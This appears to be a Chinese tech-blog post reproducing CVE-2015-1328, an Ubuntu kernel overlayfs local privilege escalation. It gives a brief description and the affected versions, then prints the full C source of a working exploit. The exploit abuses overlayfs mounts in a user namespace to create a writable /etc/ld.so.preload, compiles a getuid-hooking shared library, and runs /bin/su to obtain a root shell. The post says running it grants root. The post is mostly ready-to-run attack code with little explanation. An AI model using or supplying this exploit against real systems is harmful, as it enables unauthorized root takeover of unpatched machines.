2. 程式人生 > 實用技巧 >(CVE-2015-1328)Ubuntu Linux核心本地提權漏洞

(CVE-2015-1328)Ubuntu Linux核心本地提權漏洞

阿新 發佈:2020-07-26

(CVE-2015-1328)Ubuntu Linux核心本地提權漏洞

一、漏洞簡介

本地普通使用者可以利用該漏洞在敏感系統目錄中建立新檔案或讀取敏感檔案內容,從而提升到管理員許可權。

二、漏洞影響

Ubuntu 12.04,14.04,14.10,15.04 (核心 Kernel 3.13.0 < 3.19

三、復現過程

  • 檢視Ubuntu版本與核心

    均在漏洞影響範圍內,下載並編譯poc

    #include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
char *file;
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);

fprintf(stderr,"mount #1\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";

chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");

chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}

chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;

fprintf(stderr,"spawning threads\n");

if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");

if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid < 0) {
fprintf(stderr, "failed to create new mount namespace\n");
exit(-1);
}

waitpid(pid, &status, 0);

}

waitpid(init, &status, 0);
return 0;
}

usleep(300000);

wait(NULL);

fprintf(stderr,"child threads done\n");

fd = open("/etc/ld.so.preload",O_WRONLY);

if(fd == -1) {
fprintf(stderr,"exploit failed\n");
exit(-1);
}

fprintf(stderr,"/etc/ld.so.preload created\n");
fprintf(stderr,"creating shared library\n");
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
write(lib,LIB,strlen(LIB));
close(lib);
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
if(lib != 0) {
fprintf(stderr,"couldn't create dynamic library\n");
exit(-1);
}
write(fd,"/tmp/ofs-lib.so\n",16);
close(fd);
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
execl("/bin/su","su",NULL);
}

  • 編譯poc 後直接執行獲得許可權

相關推薦

CVE-2015-1328Ubuntu Linux核心本地漏洞

CVE-2015-1328Ubuntu Linux核心本地漏洞 一、漏洞簡介 本地普通使用者可以利用該漏洞在敏感系統目錄中建立新檔案或讀取敏感檔案內容,從而提升到管理員許可權。

CVE-2022-0847 Linux Kernel本地漏洞

0x00 漏洞概述 CVEID CVE-2022-0847 時間 2022-03-07 類型 LPE 等級 嚴重 遠端利用 否 影響範圍 攻擊複雜度

ActiveMQ反序列化漏洞CVE-2015-5254復現

ActiveMQ反序列化漏洞CVE-2015-5254復現 導語 Apache ActiveMQ是美國阿帕奇Apache軟體基金會所研發的一套開源的訊息中介軟體,它支援Java訊息服務、叢集、Spring Framework等。

Joomla 3.4.5 反序列化漏洞CVE-2015-8562

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562 2021年8月22日 21:22 漏洞介紹: 本漏洞根源是PHP5.6.13前的版本在讀取儲存好的session時,如果反序列化出錯則會跳過當前一段資料而去反序列化下一段資料。而Jooml

IE 11瀏覽器0day漏洞CVE-2015-2425UAF分析

前言 CVE-2015-2425是Hacking team洩露出來的一個IE11的0day漏洞,影響了IE11及之前的版本。在一封Hacking Team高層收到的來自Vectra Networks安全公司的信件中被發現。Vectra Networks公司的研究者在信中向Hacking

ActiveMQ反序列化漏洞CVE-2015-5254

0x01漏洞概述 ActiveMQ Web控制檯分為三個應用程式,admin,api和fileserver,其中admin是管理員頁面,api是介面,fileserver是儲存檔案的介面;管理員和 API 需要先登入才能使用,檔案伺服器不需要登入。

polkit pkexec 本地漏洞CVE-2021-4034

漏洞描述 2022年1月25日 qualys安全研究人員披露 CVE-2021-4034 polkit pkexec 本地漏洞 漏洞細節,

Linux Polkit的一個本地漏洞(cve-2021-4034)

​ 1、漏洞描述: 在 polkit 的 pkexec 工具程式中發現了一個本地許可權升級漏洞。polkit 是用於在類Unix作業系統中控制系統範圍特權的元件,它為非特權程序提供了與特權程序進行通訊的有組織的方式。polkit 的 pkex

Linux 爆發 pkexec 漏洞,麒麟軟體釋出修復方案

1 月 30 日訊息,近日,Linux Polkit 中 pkexec 許可權提升漏洞爆發,麒麟軟體迅速開展漏洞修復,已在麒麟軟體官網釋出了針對此漏洞的安全公告,為使用者提供緊急修復方案。pkexec 應用程式是一個 setuid 工具,旨在

Dirty-Pipe Linux核心漏洞CVE-2022-0847

前言: 划水一波,哈哈,以後復現漏洞不再直接傻瓜無腦的走流程了,首先碼字寫加構思比較麻煩且寫的不多還效率不高,現在就是當做見到了一個漏洞,在此記錄一下這個漏洞,包括其來源,簡單的描述,適用範圍,以及其具

Linux sudo許可權提升漏洞CVE-2021-3156復現

技術標籤:安全安全 漏洞概述 1月26日,Sudo釋出安全通告,修復了一個類Unix作業系統在命令引數中轉義反斜槓時存在基於堆的緩衝區溢位漏洞。當sudo通過-s或-i命令列選項在shell模式下執行命令時,它將在命令引數

CVE-2021-3156Linux sudo許可權提升漏洞 復現

技術標籤:許可權提升提權網路安全CVE-2021-3156 漏洞概述 1月26日,Sudo釋出安全通告,修復了一個類Unix作業系統在命令引數中轉義反斜槓時存在基於堆的緩衝區溢位漏洞。當sudo通過-s或-i命令列選項在shell模式下

Linux polkit本地許可權提升漏洞CVE-2021-4034

漏洞詳情 漏洞名稱:Linux polkit本地許可權提升漏洞CVE-2021-4034 漏洞標籤:存在EXP

linux原始碼解讀三十一:quic核心原始碼分析

  quic協議最早是google出來的,所以狗家的原始碼肯定是最“正宗”的!google把quic協議的原始碼放在了chromium裡面,所以要看quic的原始碼原則上需要下載chromium原始碼!但是這份原始碼體積很大,並且還需要FQ

Linux Polkit本地許可權提升漏洞復現CVE-2021-4034

漏洞描述 Polkit 是用於在類 Unix 作業系統中控制系統範圍特權的元件。它為非特權程序提供了與特權程序進行通訊的有組織的方式。

usbip:linux核心瞭解usb

一、前言   1、首先了解一下EHCI、UHCI和OHCI。   從硬體上來說,usb 裝置要想工作,除了外設本身,必須依賴於 usb host controller.一般來說,一個電腦裡有一個 usb host controller就可以了,她就可以控制很多個裝置

Apache Dubbo Provider預設反序列漏洞復現CVE-2020-1948

Apache Dubbo Provider預設反序列漏洞CVE-2020-1948 0x01 搭建漏洞環境 漏洞介紹 2020年06月23日, 360CERT監測發現Apache Dubbo 官方釋出了Apache Dubbo 遠端程式碼執行的風險通告,該漏洞編號為CVE-2020-1948,

F5 BIG-IP 遠端程式碼執行漏洞復現CVE-2020-5902

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

Tomcat 任意檔案上傳漏洞CVE-2017-12615

0x01簡介 2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞漏洞CVE編號:CVE-2017-12615和CVE-2017-12616,其中 遠端程式碼執行漏洞CVE-2017-12615 影響: Apache Tomcat 7.0.0 - 7.0.797.0.81修復不

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。